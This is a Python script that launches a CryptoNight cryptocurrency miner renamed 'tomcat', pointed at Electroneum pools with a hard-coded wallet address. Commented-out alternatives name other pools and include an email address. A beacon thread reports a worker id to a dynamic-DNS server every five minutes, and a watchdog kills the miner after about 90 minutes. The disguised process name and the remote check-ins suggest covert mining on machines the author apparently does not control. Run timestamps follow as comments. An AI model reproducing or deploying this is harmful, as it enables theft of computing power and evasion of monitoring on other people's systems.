import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:05.143856
#2018-02-17 16:45:06.173981
#2018-02-17 18:32:01.852881
#2018-02-17 20:20:06.859927
#2018-02-17 22:07:04.827122
#2018-02-17 23:51:03.573563
#2018-02-18 01:41:05.056188
#2018-02-18 03:28:05.119719
#2018-02-18 05:16:06.149258
#2018-02-18 07:08:02.083078
#2018-02-18 08:55:08.096238
#2018-02-18 10:42:01.256562
#2018-02-18 12:27:04.705060
#2018-02-18 14:15:07.228690
#2018-02-18 16:07:07.091295
#2018-02-18 17:56:03.337414
#2018-02-18 19:43:06.292069
#2018-02-18 21:28:07.228832
#2018-02-18 23:17:04.923041
#2018-02-19 01:04:01.467740
#2018-02-19 02:51:06.896855
#2018-02-19 04:38:03.335059
#2018-02-19 06:23:04.771792
#2018-02-19 08:12:05.596750
#2018-02-19 10:02:01.257265
#2018-02-19 11:51:05.197893
#2018-02-19 13:37:04.152914
#2018-02-19 15:26:01.281256
#2018-02-19 17:14:04.357328
#2018-02-19 19:02:10.263209
#2018-02-19 20:48:04.036268
#2018-02-19 22:35:06.193979
#2018-02-20 00:20:10.745785
#2018-02-20 02:09:01.796866
#2018-02-20 03:59:05.271749
#2018-02-20 05:43:01.903786
#2018-02-20 07:30:10.216274
#2018-02-20 09:15:07.937334
#2018-02-20 10:57:07.874516
#2018-02-20 12:46:06.067920
#2018-02-20 14:32:07.535289
#2018-02-20 16:16:12.379004
#2018-02-20 18:04:06.259126
#2018-02-20 19:55:01.905821
#2018-02-20 21:43:05.425025
#2018-02-20 23:25:04.212503
#2018-02-21 01:11:06.340548
#2018-02-21 02:57:07.063956
#2018-02-21 04:45:02.507304
#2018-02-21 06:35:04.832948
#2018-02-21 08:21:04.179477
#2018-02-21 10:06:04.065463
#2018-02-21 11:54:06.343998
#2018-02-21 13:45:09.929143
#2018-02-21 15:29:07.643973
#2018-02-21 17:20:01.962344
#2018-02-21 19:08:01.328301
#2018-02-21 20:55:06.518653
#2018-02-21 22:43:08.024584
#2018-02-22 00:31:06.587901
#2018-02-22 02:19:03.189790
#2018-02-22 04:06:05.094726
#2018-02-22 05:51:05.450933
#2018-02-22 07:38:04.466567
#2018-02-22 09:26:06.884117
#2018-02-22 11:12:08.297254
#2018-02-22 13:00:01.668594
#2018-02-22 14:47:05.372759
#2018-02-22 16:33:11.612376
#2018-02-22 18:20:04.076486
#2018-02-22 20:13:06.754408
#2018-02-22 22:01:07.521989
#2018-02-22 23:49:05.838752
#2018-02-23 01:38:07.175153
#2018-02-23 03:24:07.808677
#2018-02-23 05:10:08.433821
#2018-02-23 06:56:04.902582
#2018-02-23 08:45:08.770793
#2018-02-23 11:01:08.251435
#2018-02-23 12:56:04.651924
#2018-02-23 14:41:07.234501
#2018-02-23 16:31:01.655783
#2018-02-23 18:19:06.578388
#2018-02-23 20:05:03.731799
#2018-02-23 21:54:05.614558
#2018-02-23 23:44:05.651517
#2018-02-24 01:34:08.446794
#2018-02-24 03:23:05.294176
#2018-02-24 05:08:04.309808
#2018-02-24 06:57:03.681060
#2018-02-24 08:47:03.595855
#2018-02-24 10:48:05.158356
#2018-02-24 12:35:06.965703
#2018-02-24 14:24:01.612282
#2018-02-24 16:12:07.628146
#2018-02-24 18:05:04.189389
#2018-02-24 19:51:06.383722
#2018-02-24 21:35:07.951476
#2018-02-25 02:02:07.320034
#2018-02-25 05:59:03.742172
#2018-02-25 11:39:07.120501